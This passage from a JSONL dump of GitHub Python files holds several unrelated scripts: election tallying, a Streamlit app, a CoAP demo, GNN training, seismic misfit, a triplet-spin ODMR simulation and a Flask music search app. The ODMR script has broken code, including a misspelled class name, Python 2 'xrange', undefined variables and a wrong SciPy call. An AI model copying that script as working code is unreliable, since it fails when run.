candidate_votes:\n # Retreive the vote count of the candidate\n votes = candidate_votes[candidate_name]\n # Calculate the percentage of votes\n vote_percentage = float(votes) / float(total_votes) * 100\n # 5. Print out each candidates name, vote count and percentage of votes to terminal\n #print(f\"{candidate_name}: {vote_percentage:.1f}% ({votes:,})\\n\")\n\n #Add each candidate election results to the text file\n candidate_results = (f\"{candidate_name}: {vote_percentage:.1f}% ({votes:,})\\n\")\n #Print the candidate, vote percentage and vote count to the terminal\n print(candidate_results)\n #Save candidate results to the text file\n txt_file.write(candidate_results)\n\n #Determine winning vote count and candidate\n #Determine if the votes is greater than the winning count\n if (votes > winning_count) and (vote_percentage > winning_percentage):\n #If true, then set winning_count and winning_percent equal to the vote_percentage\n winning_count = votes\n winning_percentage = vote_percentage\n #and set the winning_candidate equal to the candidates name\n winning_candidate = candidate_name\n\n \n\n #Print out the winning candidate summary\n winning_candidate_summary = (\n f\"-----------------------------\\n\"\n f\"Winner: {winning_candidate}\\n\"\n f\"Winning Vote Count: {winning_count:,}\\n\"\n f\"Winning Percentage: {winning_percentage:.1f}%\\n\"\n f\"-----------------------------\\n\"\n )\n print(winning_candidate_summary)\n # Save candidate results to the text file\n txt_file.write(winning_candidate_summary)\n\n\n\n","repo_name":"corispade/Module3_Election_Analysis","sub_path":"PyPoll.py","file_name":"PyPoll.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33108801093","text":"import streamlit as st\nfrom PIL import Image\nimport os, sys\nimport json\nimport pandas as pd \nimport requests as rq\n\n#Siempre que veas 'pass' es un TO-DO (por hacer)\n\n# se localiza del fichero y se hacen saltos hasta la raiz del proyecto\npath = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) \nsys.path.append(path)\n\n# se importan las funciones desde la raiz del proyecto\nfrom src.utils.stream_config import draw_map\nfrom src.utils.dataframes import load_csv_for_map\nfrom src.utils import sql_functions\n\n\nmenu = st.sidebar.selectbox('Menu:',\n options=[\"No selected\", \"Load Image\", \"Map\", \"API\", \"MySQL\", \"Machine Learning\"])\n\nif menu == \"No selected\": \n # se genera la instrucción de apertura del fichero de configuración para cargar los datos en una variable\n with open(path + os.sep + 'config' + os.sep + 'config.json', 'r') as outfile:\n json_readed = json.load(outfile)\n\n # se cargan los datos de la variable en los datos que saldrán por pantalla\n st.title(json_readed['Title'])\n st.write(json_readed['Description'])\n \nif menu == \"Load Image\":\n # Se carga la imagen que está en data/img/happy.jpg\n image = Image.open(path + os.sep + 'data' + os.sep + 'img' + os.sep + 'happy.jpg', 'r') \n st.image (image,use_column_width=True)\n\nif menu == \"Map\":\n # El archivo que está en data/ con nombre 'red_recarga_acceso_publico_2021.csv'\n csv_map_path = path + os.sep + 'data' + os.sep + 'red_recarga_acceso_publico_2021.csv'\n df_map = load_csv_for_map(csv_map_path)\n draw_map(df_map)\n\nif menu == \"API\":\n datos_json = rq.get('http://localhost:6060/info').json()\n st.dataframe(pd.DataFrame(datos_json))\n\nif menu == \"Australia Fire\":\n \"\"\"6\"\"\"\n\n # 1. Conecta a la BBDD OK\n # 2. Obtén, a partir de sentencias SQL (no pandas), la información de las tablas que empiezan por 'fire_archive*' (join) OK\n\n # 3. Entrena tres modelos de ML diferentes siendo el target la columna 'fire_type'. Utiliza un pipeline que preprocese los datos con PCA. Usa Gridsearch.\n # \n # \n # 4. Añade una entrada en la tabla 'student_findings' por cada uno de los tres modelos. 'student_id' es EL-ID-DE-TU-GRUPO.\n\n\n # 5. Obtén la información de la tabla 'fire_nrt_M6_96619' y utiliza el mejor modelo para predecir la columna target de esos datos. \n\n \n # 6. Usando SQL (no pandas) añade una columna nueva en la tabla 'fire_nrt_M6_96619' con el nombre 'fire_type_EL-ID-DE-TU-GRUPO'\n\n\n # 7. Muestra por pantalla en Streamlit la tabla completa (X e y)\n pass\n\n\n","repo_name":"MikeBarkerSpain/TheDataApes","sub_path":"src/streamlit/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29825973512","text":"#!/usr/bin/python\n\nfrom coap.resource import CoapResource\nfrom time import sleep\n\n\nres = CoapResource(\"http://localhost:8888\")\n\nres.add_resource(\"r1\", (\"test\",))\nres.add_resource(\"r2\", (\"sensors\", \"temp\"))\n\ndata = {\"type\": \"python\", \"message\": \"\"}\nresources = res.get_resources().keys()\n\ntry:\n while True:\n for name in resources:\n data[\"message\"] = name\n\n res.send_event(name, data)\n\n sleep(5)\nexcept KeyboardInterrupt:\n for name in resources:\n res.remove_resource(name)\n","repo_name":"QualiApps/coap-subject","sub_path":"example/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32717155924","text":"import logging\nimport sys\nfrom argparse import ArgumentParser, Namespace\n\nlogger = logging.getLogger(\"wandb\")\nlogger.setLevel(logging.ERROR)\nsys.path.insert(0, \"../MultiOmicsGraphEmbedding/\")\n\nimport pytorch_lightning as pl\nfrom pytorch_lightning.trainer import Trainer\n\nfrom pytorch_lightning.callbacks import EarlyStopping\n\nfrom ogb.nodeproppred import PygNodePropPredDataset\nfrom ogb.linkproppred import PygLinkPropPredDataset\nfrom cogdl.datasets.han_data import ACM_HANDataset, DBLP_HANDataset, IMDB_HANDataset\nfrom cogdl.datasets.gtn_data import ACM_GTNDataset, DBLP_GTNDataset, IMDB_GTNDataset\nfrom torch_geometric.datasets import AMiner\n\nfrom pytorch_lightning.loggers import WandbLogger\nfrom pytorch_lightning.callbacks import EarlyStopping\n\nfrom moge.generator import HeteroNeighborSampler, TripletSampler\nfrom moge.module.PyG.node_clf import LATTENodeClassifier\nfrom moge.module.PyG.link_pred import LATTELinkPredictor\nfrom run.utils import load_node_dataset\n\n\ndef train(hparams: Namespace):\n NUM_GPUS = hparams.num_gpus\n USE_AMP = False # True if NUM_GPUS > 1 else False\n MAX_EPOCHS = 50\n\n neighbor_sizes = [hparams.n_neighbors, ]\n for t in range(1, hparams.t_order):\n neighbor_sizes.extend([neighbor_sizes[-1] // 2])\n print(\"neighbor_sizes\", neighbor_sizes)\n hparams.neighbor_sizes = neighbor_sizes\n\n dataset = load_node_dataset(hparams.dataset, method=\"LATTE\", hparams=hparams, train_ratio=None,\n dir_path=hparams.dir_path)\n\n METRICS = [\"precision\", \"recall\", \"f1\", \"accuracy\" if dataset.multilabel else hparams.dataset, \"top_k\"]\n hparams.loss_type = \"BCE\" if dataset.multilabel else hparams.loss_type\n hparams.n_classes = dataset.n_classes\n model = LATTENodeClassifier(hparams, dataset, collate_fn=\"neighbor_sampler\", metrics=METRICS)\n\n logger = WandbLogger(name=model.name(), tags=[dataset.name()], project=\"multiplex-comparison\")\n\n trainer = Trainer(\n gpus=NUM_GPUS,\n distributed_backend='ddp' if NUM_GPUS > 1 else None,\n gradient_clip_val=hparams.gradient_clip_val,\n # auto_lr_find=True,\n max_epochs=MAX_EPOCHS,\n # early_stop_callback=EarlyStopping(monitor='val_loss', patience=5, min_delta=0.001, strict=False),\n logger=logger,\n amp_level='O1' if USE_AMP else None,\n precision=16 if USE_AMP else 32\n )\n\n trainer.fit(model)\n trainer.test(model)\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument('--num_gpus', type=int, default=1)\n # parametrize the network\n parser.add_argument('--dataset', type=str, default=\"ogbn-mag\")\n parser.add_argument('--dir_path', type=str, default=\"~/Bioinformatics_ExternalData/OGB/\")\n\n parser.add_argument(\"-d\", '--embedding_dim', type=int, default=128)\n parser.add_argument(\"-t\", '--t_order', type=int, default=2)\n parser.add_argument('-n', '--batch_size', type=int, default=2000)\n parser.add_argument('--n_neighbors', type=int, default=20)\n parser.add_argument('--activation', type=str, default=\"relu\")\n parser.add_argument('--attn_heads', type=int, default=64)\n parser.add_argument('--attn_activation', type=str, default=\"LeakyReLU\")\n parser.add_argument('--attn_dropout', type=float, default=0.2)\n\n parser.add_argument('--nb_cls_dense_size', type=int, default=0)\n parser.add_argument('--nb_cls_dropout', type=float, default=0.3)\n\n parser.add_argument('--use_proximity', type=bool, default=False)\n parser.add_argument('--neg_sampling_ratio', type=float, default=5.0)\n parser.add_argument('--use_class_weights', type=bool, default=False)\n parser.add_argument('--use_reverse', type=bool, default=True)\n\n parser.add_argument('--loss_type', type=str, default=\"SOFTMAX_CROSS_ENTROPY\")\n parser.add_argument('--lr', type=float, default=0.001)\n parser.add_argument('--weight_decay', type=float, default=1e-2)\n parser.add_argument('--gradient_clip_val', type=float, default=1.0)\n # add all the available options to the trainer\n # parser = pl.Trainer.add_argparse_args(parser)\n\n args = parser.parse_args()\n train(args)\n","repo_name":"AspirinCode/MultiOmicsGraphEmbedding","sub_path":"run/latte_node.py","file_name":"latte_node.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29771977140","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport numpy as np\nfrom obspy import Trace\nimport obspy.signal.cross_correlation as crosscorr\n\nVERBOSE_NAME = \"Zero-lag Cross-Correlation-Coefficient\"\n\nDESCRIPTION = r\"\"\"\nThis is the CCC misfit as used by famous seismologist Ya-Jian Gao in \nseveral of his publications.\n\"\"\" # NOQA\n\n# Optional: document any additional parameters this particular adjoint sources\n# receives in addition to the ones passed to the central adjoint source\n# calculation function. Make sure to indicate the default values. This is a\n# bit redundant but the only way I could figure out to make it work with the\n# rest of the architecture.\nADDITIONAL_PARAMETERS = r\"\"\"\n**taper_percentage** (:class:`float`)\n Decimal percentage of taper at one end (ranging from ``0.0`` (0%) to\n ``0.5`` (50%)). Defauls to ``0.15``.\n\n**taper_type** (:class:`float`)\n The taper type, supports anything :meth:`obspy.core.trace.Trace.taper`\n can use. Defaults to ``\"cosine\"``.\n\"\"\"\n\n\ndef xcorr_shift(s, d, min_period):\n \"\"\"\n Calculate the correlation time shift around the maximum amplitude of the\n synthetic trace with subsample accuracy.\n \"\"\"\n # Estimate shift and use it as a guideline for the subsample accuracy\n # shift.\n # the dt works if these are obspy traces, currently not sure\n shift = int(np.ceil(min_period / s.stats.delta))\n cc = crosscorr.correlate(s, d, shift=shift)\n time_shift = (cc.argmax() - shift) * s.stats.delta\n return time_shift\n\n\ndef calculate_adjoint_source(observed, synthetic, window, min_period,\n max_period,\n adjoint_src, plot=False, taper=True,\n taper_ratio=0.15, taper_type=\"cosine\",\n **kwargs):\n\n ret_val = {}\n\n if window:\n if len(window) == 2:\n weight = 1.0\n else:\n weight = window[2]\n else:\n weight = 1.0\n\n # Work on copies of the original data\n observed = observed.copy()\n synthetic = synthetic.copy()\n CC = np.sum(observed.data * synthetic.data)\n\n oo = np.sum(observed.data * observed.data)\n ss = np.sum(synthetic.data * synthetic.data)\n weight_2 = np.sqrt(oo * ss)\n\n misfit = 1 - CC / weight_2\n\n\n ret_val[\"misfit\"] = misfit\n\n # # Subsample accuracy time shift\n # time_shift = xcorr_shift(synthetic, observed, min_period)\n # if time_shift >= min_period / 2.0:\n # ret_val[\"adjoint_source\"] = Trace(data=np.zeros_like(observed.data),\n # header=observed.stats)\n # return ret_val\n\n if adjoint_src:\n A = CC / ss\n adj = (observed.data - A * synthetic.data) / weight_2\n adj_src = Trace(data=weight * adj *\n synthetic.stats.delta, header=observed.stats)\n ret_val[\"adjoint_source\"] = adj_src\n\n return ret_val\n","repo_name":"solvithrastar/Inversionson","sub_path":"inversionson/hpc_processing/ccc.py","file_name":"ccc.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"54"} +{"seq_id":"24458764522","text":"\nimport numpy as np\nfrom numpy.linalg import eig\nimport cmath \nimport math\nimport sys\nfrom functools import reduce\nimport scipy\n\ndef random_unit_vector() : \n phi = 2.0 * math.pi * np.random.random()\n z = 2.0 * np.random.random() - 1.0\n r = math.sqrt(1.0 - z*z)\n return np.array([r * math.cos(phi), r * math.sin(phi), z ])\n\nclass Rotation : \n \"\"\" \n * Rotation : provides a representation for 3D space rotations\n * using euler angles (ZX'Z'' convention) or rotation matrices\n \"\"\"\n def _euler2mat_z1x2z3(self, z1 = 0, x2 = 0, z3 = 0) :\n cosz1 = math.cos(z1)\n sinz1 = math.sin(z1)\n Z1 = np.array(\n [[cosz1, -sinz1, 0],\n [sinz1, cosz1, 0],\n [0, 0, 1]])\n\n \n cosx = math.cos(x2)\n sinx = math.sin(x2)\n X2 = np.array(\n [[1, 0, 0],\n [0, cosx, -sinx],\n [0, sinx, cosx]])\n\n cosz3 = math.cos(z3)\n sinz3 = math.sin(z3)\n Z3 = np.array(\n [[cosz3, -sinz3, 0],\n [sinz3, cosz3, 0],\n [0, 0, 1]])\n \n return reduce(np.dot, [Z1, X2, Z3] )\n \n\n def _mat2euler(self, M):\n M = np.asarray(M)\n try:\n sy_thresh = np.finfo(M.dtype).eps * 4\n except ValueError:\n sy_thresh = _FLOAT_EPS_4\n r11, r12, r13, r21, r22, r23, r31, r32, r33 = M.flat\n sy = math.sqrt(r31*r31 + r32*r32)\n if sy > sy_thresh: \n x2 = math.acos(r33)\n z1 = math.atan2(r13, -r23)\n z3 = math.atan2(r31, r32)\n else:\n x2 = 0\n z3 = 0\n z1 = math.atan2(r21, r22)\n return (z1, x2, z3)\n\n def _init_from_angles(self, z1, x2, z3) :\n self._z1, self._x2, self._z3 = z1, x2, z3\n self._M = self._euler2mat_z1x2z3(self._z1, self._x2, self._z3)\n\n def _init_from_matrix(self, matrix) :\n self._M = np.asarray(matrix)\n self._z1, self._x2, self._z3 = self._mat2euler(self._M) \n\n def __init__(self, arg1 = None, x2 = None, z3 = None): \n if arg1 is None :\n self._init_from_angles(0, 0, 0) # loads identity matrix\n elif x2 is not None:\n self._init_from_angles(arg1, x2, z3)\n elif arg1.size == 3:\n self._init_from_angles(arg1[0], arg1[1], arg1[2])\n else:\n self._init_from_matrix(arg1)\n\n def matrix(self, new_matrix = None) : \n if new_matrix is not None:\n self._init_from_matrix(new_matrix)\n return self._M\n\n def euler_angles(self, z1 = None, x2 = None, z3 = None) : \n if z1 is not None:\n self._init_from_angles(z1, x2, z3)\n return (self._z1, self._x2, self._z3)\n\n\n def random(self) : \n self.euler_angles( 2. * math.pi * np.random.random(), np.arccos( 2.0 * np.random.random() - 1.0 ), 2. * math.pi * np.random.random() )\n\nclass TripletHamiltonian : \n def __init__ (self) :\n self.Id = np.matrix('1 0 0; 0 1 0; 0 0 1', dtype=np.complex_)\n self.Sz = np.matrix('1 0 0; 0 0 0; 0 0 -1', dtype=np.complex_)\n self.Sx = np.matrix('0 1 0; 1 0 1; 0 1 0', dtype=np.complex_) / math.sqrt(2.0)\n self.Sy = - 1j * np.matrix('0 1 0; -1 0 1; 0 -1 0', dtype=np.complex_) / math.sqrt(2.0)\n\n def fine_structure(self, D, E, rotation = Rotation() ) :\n rotation_matrix = rotation.matrix()\n rSx = rotation_matrix[0,0] * self.Sx + rotation_matrix[0,1] * self.Sy + rotation_matrix[0,2] * self.Sz\n rSy = rotation_matrix[1,0] * self.Sx + rotation_matrix[1,1] * self.Sy + rotation_matrix[1,2] * self.Sz\n rSz = rotation_matrix[2,0] * self.Sx + rotation_matrix[2,1] * self.Sy + rotation_matrix[2,2] * self.Sz \n return D * (np.dot(rSz, rSz) - 2.*self.Id/3.) + E * (np.dot(rSy, rSy) - np.dot(rSx, rSx))\n\n def zeeman(self, Bx, By, Bz) :\n return Bx * self.Sx + By * self.Sy + Bz * self.Sz\n\n def spin_hamiltonian_mol_basis(self, D, E, B, theta, phi) : \n Bz = B * math.cos(theta) \n Bx = B * math.sin(theta) * math.cos(phi) \n By = B * math.sin(theta) * math.sin(phi) \n\n return self.fine_structure(D, E) + self.zeeman(Bx, By, Bz)\n\n def spin_hamiltonian_field_basis(self, D, E, B, theta, phi) : \n return self.fine_structure(D, E, Rotatino(0, -theta, -phi+math.pi/2.)) + self.zeeman(0, 0, B)\n\n def eval(self, D, E, B, theta = 0, phi = 0, mol_basis = True) : \n if mol_basis: \n return np.linalg.eigvalsh(self.spin_hamiltonian_mol_basis(D, E, B, theta, phi))\n else: \n return np.linalg.eigvalsh(self.spin_hamiltonian_field_basis(D, E, B, theta, phi))\n\nclass TwoTriplets :\n def __init__ (self) :\n self.triplet = TripletHamiltonian()\n self.E = None \n self.D = None \n self.J = None\n self.Jdip = None\n self.B = None\n self.matrix_size = 9\n\n s2i3 = math.sqrt(2.0/3.0);\n si2 = 1.0/math.sqrt(2.0);\n si3 = 1.0/math.sqrt(3.0);\n si6 = 1.0/math.sqrt(6.0);\n \n self.Jproj = np.array( [ [ 0, 0, si3, 0, -si3, 0, si3, 0, 0 ],\n [ 0, 0, 0, 0, 0, -si2, 0, si2, 0 ],\n [ 0, 0, -si2, 0, 0, 0, si2, 0, 0 ],\n [ 0, -si2, 0, si2, 0, 0, 0, 0, 0 ],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 1.0 ],\n [ 0, 0, 0, 0, 0, si2, 0, si2, 0 ],\n [ 0, 0, si6, 0, s2i3, 0, si6, 0, 0 ], \n [ 0, si2, 0, si2, 0, 0, 0, 0, 0 ],\n [ 1.0, 0, 0, 0, 0, 0, 0, 0, 0 ] ] )\n\n def exchange_matrix(self) : \n return np.kron(self.triplet.Sx, self.triplet.Sx) + np.kron(self.triplet.Sy, self.triplet.Sy) + np.kron(self.triplet.Sz, self.triplet.Sz)\n\n \n def dipole_dipole_matrix(self, uvec) : \n \"\"\"\n returns dipole-dipole interaction matrix, assumes that uvec an unit normalized 3d vector\n \"\"\"\n unorm = np.linalg.norm(uvec)\n uvec = uvec / unorm \n uS = uvec[0] * self.triplet.Sx + uvec[1] * self.triplet.Sy + uvec[2] * self.triplet.Sz\n return (self.exchange_matrix() - 3. * np.kron(uS, uS))\n\n def load_field_basis_Hamiltonian(self, triplet1_rotation, triplet2_rotation, dip_vec = None) : \n H1 = self.triplet.fine_structure(self.D, self.E, triplet1_rotation) + self.triplet.zeeman(0, 0, self.B)\n H2 = self.triplet.fine_structure(self.D, self.E, triplet2_rotation) + self.triplet.zeeman(0, 0, self.B)\n self.Hfull = np.kron(H1, self.triplet.Id) + np.kron(self.triplet.Id, H2) + self.J * self.exchange_matrix() \n if dip_vec is not None:\n self.Hfull += self.Jdip * self.dipole_dipole_matrix(dip_vec)\n \n def diag(self) :\n self.eval,self.evec = np.linalg.eigh(self.Hfull)\n\n def quintet_content(self, i): \n iProj = np.dot( self.Jproj[4:9, 0:9], self.evec[0:9, i:i+1] );\n norm2 = np.dot( np.matrix.getH(iProj), iProj );\n return norm2[0,0].real;\n\n def triplet_content(self, i): \n iProj = np.dot( self.Jproj[1:4, 0:9], self.evec[0:9, i:i+1] );\n norm2 = np.dot( np.matrix.getH(iProj), iProj );\n return norm2[0,0].real;\n\n def singlet_content(self, i): \n iProj = np.dot( self.Jproj[0:1, 0:9], self.evec[0:9, i:i+1] );\n norm2 = np.dot( np.matrix.getH(iProj), iProj );\n return norm2[0,0].real;\n\n \n def sz_elem(self, i): \n Sz2 =np.kron(self.triplet.Sz, self.triplet.Id) + np.kron(self.triplet.Id, self.triplet.Sz)\n vi = self.evec[:,i]\n Sz2ii = reduce(np.dot, [ np.matrix.getH(vi), Sz2, vi ])\n return Sz2ii[0,0].real \n\n def singlet_projector(self):\n singlet_state = np.asmatrix(self.Jproj[0:1,:])\n return np.dot( np.matrix.getH(singlet_state), singlet_state )\n\n\n def Bac_field_basis_matrix(self): \n return np.kron(self.triplet.Sx, self.triplet.Id) + np.kron(self.triplet.Id, self.triplet.Sx)\n\n def print_info(self) : \n print(\"# D %g\" % self.D)\n print(\"# E %g\" % self.E)\n print(\"# B %g\" % self.B)\n print(\"# J %g\" % self.J)\n print(\"# Jip %g\" % self.Jdip)\n\nclass ODMR_Signal : \n \"\"\" \n * ODMR_Signal\n *\n * Output : Computes ODMR and magnetic resonance signals \n *\n * Input : spins, a reference on SpinSystem object\n * SpinSystem should define \n * spins.matrix_size\n * spins.evec\n * spins.eval\n * spins.singlet_projector()\n * spins.Bac_field_basis_matrix()\n \"\"\"\n def __init__(self, spin_system) : \n self.spins = spin_system \n self.rho0 = np.empty(self.spins.matrix_size, dtype=float)\n self.rho2 = np.empty([self.spins.matrix_size, self.spins.matrix_size], dtype=np.complex_) \n self.gamma = None\n self.gamma_diag = None\n\n def update_from_spin_hamiltonian(self) : \n self.Sproj_eig_basis = reduce(np.dot, [ np.matrix.getH( self.spins.evec ), self.spins.singlet_projector(), self.spins.evec])\n self.V = reduce(np.dot, [ np.matrix.getH( self.spins.evec ), self.spins.Bac_field_basis_matrix(), self.spins.evec ])\n \n def omega_nm(self, n, m) :\n return self.spins.eval[n] - self.spins.eval[m]\n\n def load_rho0_thermal(self, Temp): \n sum = 0\n for i in range(self.spins.matrix_size) : \n rho_i = math.exp(- self.spins.eval[i] / Temp)\n self.rho0[i] = rho_i\n sum += rho_i\n self.rho0 /= sum\n\n def load_rho0_from_singlet(self) : \n sum = 0\n for i in range(self.spins.matrix_size) : \n self.rho0[i] = self.Sproj_eig_basis[i, i].real\n sum += self.rho0[i]\n self.rho0 /= sum\n\n def chi1(self, omega):\n c1 = 0j\n for m in range(self.spins.matrix_size): \n for n in range(self.spins.matrix_size): \t \n # the contribution to chi1 vanishes for n == m, whether gamma is the same for diagonal and non diagonal elements is not relvant here \n Vmn = self.V[m, n]\n Vmn_abs2 = Vmn.real * Vmn.real + Vmn.imag * Vmn.imag\n c1 -= (self.rho0[m] - self.rho0[n]) * Vmn_abs2 / ( self.omega_nm(n, m) - omega - 1j * self.gamma );\n return c1\n\n\n def find_rho2_explicit(self, omega) :\n for m in range(self.spins.matrix_size): \n for n in range(self.spins.matrix_size):\n rrr = 0j\n for nu in range(self.spins.matrix_size): \n for p in [-1., 1.]: \n gamma_nm = self.gamma_diag if m == n else self.gamma\n rrr += (self.rho0[m] - self.rho0[nu]) * self.V[n, nu] * self.V[nu, m] / ( ( self.omega_nm(n, m) - 1j * gamma_nm ) * ( self.omega_nm(nu, m) - omega * p - 1j * self.gamma ) )\n rrr -= (self.rho0[nu] - self.rho0[n]) * self.V[n, nu] * self.V[nu, m] / ( ( self.omega_nm(n, m) - 1j * gamma_nm ) * ( self.omega_nm(n, nu) - omega * p - 1j * self.gamma ) )\n self.rho2[n, m] = rrr\n\n\n def find_rho2(self, omega):\n Vtmp = np.zeros( (self.spins.matrix_size, self.spins.matrix_size), dtype=np.complex_) \n for m in range(self.spins.matrix_size):\n for nu in range(self.spins.matrix_size):\n for p in [-1., 1.]:\n Vtmp[nu, m] += (self.rho0[m] - self.rho0[nu]) * self.V[nu, m] / (self.omega_nm(nu, m) - omega * p - 1j * self.gamma)\n self.rho2 = np.dot(self.V, Vtmp) - np.dot(Vtmp, self.V)\n for m in range(self.spins.matrix_size):\n for n in range(self.spins.matrix_size):\n gamma_nm = self.gamma_diag if m == n else self.gamma\n self.rho2[n, m] /= ( self.omega_nm(n, m) - 1j * gamma_nm );\n\n\n def odmr(self, omega):\n odmr_amp = 0j\n self.find_rho2(omega)\n \n for m in range(self.spins.matrix_size):\n for n in range(self.spins.matrix_size):\n odmr_amp += self.rho2[m , n] * self.Sproj_eig_basis[n, m]\n\n return odmr_amp.real\n\ndef chi_spectra_triplet(triplet, omega_range, B, theta, phi) :\n triplet.B = B\n triplet.phi = phi\n triplet.theta = theta\n triplet.J = 0j\n triplet.Jdip = 0j\n\n V1 = Rotation()\n V1.euler_angles(phi, theta, 0)\n Ur = random_unit_vector()\n triplet.load_field_basis_Hamiltonian( V1, V1, Ur )\n triplet.diag()\n \n odmr_from_triplets = ODMR_Signal(triplet)\n odmr_from_triplets.gamma = 1\n odmr_from_triplets.gamma_diag = 1\n odmr_from_triplets.update_from_spin_hamiltonian()\n odmr_from_triplets.load_rho0_thermal(3000.0)\n \n chi_vec = [ ]\n\n for omega in omega_range:\n chi = odmr_from_triplets.chi1(2*omega*math.pi)\n chi_vec.append( chi.imag )\n return chi_vec\n\ndef load_data(filename, freq_start, freq_stop) : \n dataDC2 = np.loadtxt(filename, comments='%') # , usecols=(0,1,3),unpack=True)\n\n freq_index_start = None\n freq_index_stop = None\n\n index = 0\n while dataDC2[index, 0] < dataDC2[index+1, 0] : \n if freq_index_start is None and dataDC2[index, 0]*1e-6 > freq_start:\n freq_index_start = index\n if freq_index_stop is None and dataDC2[index, 0]*1e-6 > freq_stop:\n freq_index_stop = index\n index += 1\n freq_total_length = index+1\n \n freqDC2 = (dataDC2[freq_index_start:freq_index_stop, 0]) / 1e6\n Bfield_size = int(len(dataDC2)/freq_total_length)\n\n fieldDC2 = np.zeros(Bfield_size)\n freq_size = freq_index_stop - freq_index_start \n IntensityDC2 = np.zeros((Bfield_size, freq_size))\n \n for i in xrange(Bfield_size):\n fieldDC2[i] = np.mean(dataDC2[i * freq_total_length:(i + 1) * freq_total_length, 1])\n IntensityDC2[i, :] = dataDC2[i * freq_total_length + freq_index_start:i * freq_total_length + freq_index_stop, 3]\n \n return (freqDC2, fieldDC2, IntensityDC2)\n\ndef ranges_for_cycles(nAng, nField):\n max_ang = math.radians(90.0) * (1.0 / nAng + 1.0)\n max_field = 81\n return np.arange(0, max_ang, max_ang/nAng), np.arange(0, max_field, 81/nField)\n\ndef build_theory(Chi, IDC2, nAng, lenfr,lenf):\n Experiment = IDC2.flat\n pVec, rnorm1 = scipy.nnls(Chi, Experiment)\n pMatrix = np.reshape(pVec, (nAng, nAng))\n TheoryVec = np.dot(Chi, pVec)\n return np.reshape(TheoryVec, (lenfr, lenf))\n\ndef output(nAng, freqs, fields, lambda_filename, test_filename, Chi, theory_filename, TheoryMatr):\n Lfile = open(lambda_filename, 'w+')\n for k in xrange(int(nAng * nAng)):\n index_p = 0\n for Field in fields:\n for Freq in freqs:\n Lfile.write(str(Freq) + ' ' + str(Field) + ' ' + str(Chi[index_p][k]) + ' ' + str(ChiIm[index_p][k]) + '\\n')\n index_p += 1\n Lfile.write(\"\\n\")\n\n Lfile.close\n Tfile = open(test_filename, 'w+')\n index_p = 0\n for Freq in freqs:\n Tfile.write(str(Freq) + ' ' + str(Chi[index_p][4]) + '\\n')\n index_p += 1\n Tfile.write(\"\\n\")\n Tfile.close\n\n Theoryfile = open(theory_filename, 'w+')\n i = 0\n for Freq in freqs:\n j = 0\n for Field in fields:\n Theoryfile.write(str(Freq) + ' ' + str(Field) + ' ' + str(TheoryMatr[i][j]) + '\\n')\n j += 1\n gnufile.write(\"\\n\")\n i +=1\n gnufile.close\n\ndef main():\n freqDC2, fieldDC2, IntensityDC2 = load_data(\"testupto30up.txt\", 325, 725)\n triplet = TwoTriplets()\n triplet.D = 487.9\n triplet.E = 72.9\n nAng = 5.\n nField = float(len(fieldDC2))\n Angles, MagFields = ranges_for_cycles(nAng, nField) #angles range in radians\n Chi = np.zeros((int(len(freqDC2)*len(fieldDC2)),int(nAng*nAng)))\n ChiIm = np.zeros((len(freqDC2)*len(fieldDC2),int(nAng*nAng)))\n index_Phi = 0\n index_a = 0\n Lfile = open('LambdaNew.dat', 'w+')\n for Phi in Angles:\n index_Theta = 0\n for Theta in Angles:\n index_B = 0\n index_p = 0\n for Field in MagFields:\n chi_freq = chi_spectra_triplet(triplet, freqDC2, Field, Theta, Phi)\n index_int = len(chi_freq)\n a = np.asarray(chi_freq)\n b = int(index_p + index_int)\n Chi[index_p:b,index_a] = a[:]\n index_p += index_int\n index_B += 1\n index_a += 1\n index_Theta += 1\n index_Phi += 1\n\n TheoryMatr = build_theory(Chi, IntensityDC2, nAng, len(freqDC2),len(fieldDC2))\n output(nAng, freqDC2, fieldDC2, 'LambdasNew.dat', 'TestNew.dat', Chi, 'TheoryNew.dat', TheoryMatr)\n\n\n\nmain()\n","repo_name":"KamChaos/TripletODMR","sub_path":"triplet_chi.py","file_name":"triplet_chi.py","file_ext":"py","file_size_in_byte":17047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42202698607","text":"from flask import Flask, render_template, request, jsonify\nfrom decoder2 import wangyi\nfrom kume_music import kume\nfrom Ku_Dog import ku_dog\nfrom xiage import Song\nfrom qq_music import get_song\nfrom get_video import get_aim_video\nfrom yocool import get_deatil\nfrom miGu import miGuSong\nimport logging as log\nfrom get_video_2 import Video\napp = Flask(__name__)\n\n# 默认音乐\n@app.route('/')\n@app.route('/index')\ndef hello_world():\n return render_template('music_index.html')\n\n# 视频页面\n@app.route('/index/video', methods=['GET', 'POST'])\ndef video():\n if request.method == 'GET':\n return render_template('video.html', datas={})\n else:\n key_word = request.form.get('search_key')\n select_id = request.form.get('select_id')\n log.info('选择的播放器'+str(select_id))\n if select_id == '腾讯视频':\n video_data_item = Video().search_by_name(key_word)\n if len(video_data_item) == 0:\n data = {'statu': '0', 'info': '没有查到相关的信息,请重新输入你的选择'}\n else:\n data = {'statu': '1', 'info': video_data_item, 'length': len(video_data_item)}\n else:\n data = {'statu': '0', 'info': '没有查到相关的信息,请重新输入你的选择'}\n return render_template('video.html', datas=data)\n@app.route('/index/search')\ndef search():\n key_vlaue = request.args.get('query_value')\n check_vlaue = request.args.get(\"type\")\n log.info(\"选择的播放器是\"+str(check_vlaue)+\"请求参数是:\"+str(key_vlaue))\n if check_vlaue == '网易云音乐':\n song_url = wangyi(key_vlaue)\n if song_url != '':\n data = dict(data=song_url, statu=1)\n return jsonify(data)\n else:\n if check_vlaue == 'QQ音乐':\n song_id = get_song(key_vlaue)\n elif 